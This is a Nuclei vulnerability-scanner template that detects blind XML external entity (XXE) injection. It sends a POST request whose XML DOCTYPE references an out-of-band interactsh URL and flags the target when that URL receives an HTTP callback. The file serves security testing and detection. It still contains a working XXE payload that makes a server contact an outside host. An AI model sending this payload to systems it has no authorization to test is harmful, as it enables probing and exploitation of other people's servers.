nuclei-templates/http/vulnerabilities/generic/generic-blind-xxe.yaml

id: generic-blind-xxe

info:
  name: Generic Blind XXE
  author: geeknik
  severity: high
  metadata:
    max-request: 1
  tags: xxe,generic,blind

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Referer: {{BaseURL}}

        <?xml version="1.0"?>
        <!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
        <foo>&e1;</foo>        

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

# digest: 490a00463044022051ebe2060d9ee98554782b4c73d862fb964a8c898d861d34d6ba0d70f4098ba502200c7eb3168c944892680805ddaa78d8427909d1b0fea308cf9e6c30c805b9edf5:922c64590222798bb761d5b6d8e72950